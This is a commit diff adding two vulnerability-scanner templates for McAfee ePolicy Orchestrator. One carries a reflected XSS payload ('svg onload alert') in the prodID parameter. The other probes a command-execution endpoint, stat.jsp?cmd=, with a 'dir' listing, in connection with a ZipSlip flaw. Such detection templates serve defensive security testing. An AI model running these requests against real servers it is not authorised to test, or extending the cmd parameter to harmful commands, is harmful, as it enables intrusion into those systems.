commit
f83258f4a4
|
@ -0,0 +1,41 @@
|
|||
id: cve-2020-7318
|
||||
|
||||
info:
|
||||
name: McAfee ePolicy Orchestrator Reflected XSS
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||||
prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
|
||||
script or HTML via multiple parameters where the administrator's entries
|
||||
were not correctly sanitized.
|
||||
|
||||
References:
|
||||
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
- "8443"
|
||||
raw:
|
||||
- |
|
||||
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
||||
Host: {{Hostname}}:§port§
|
||||
Connection: close
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "Policy Name"
|
||||
- "'\"><svg/onload=alert(document.domain)>"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,34 @@
|
|||
id: mcafee-epo-rce
|
||||
|
||||
info:
|
||||
name: McAfee ePolicy Orchestrator RCE
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: |
|
||||
A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||||
is a type of Path Traversal occurring when archives are unpacked
|
||||
if the names of the packed files are not properly sanitized.
|
||||
An attacker can create archives with files containing “../” in their names,
|
||||
making it possible to upload arbitrary files
|
||||
to arbitrary directories or overwrite existing ones during archive extraction.
|
||||
|
||||
References:
|
||||
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
- type: regex
|
||||
regex:
|
||||
- "Volume (in drive [A-Z]|Serial Number) is"
|
||||
part: body
|
Loading…
Reference in New Issue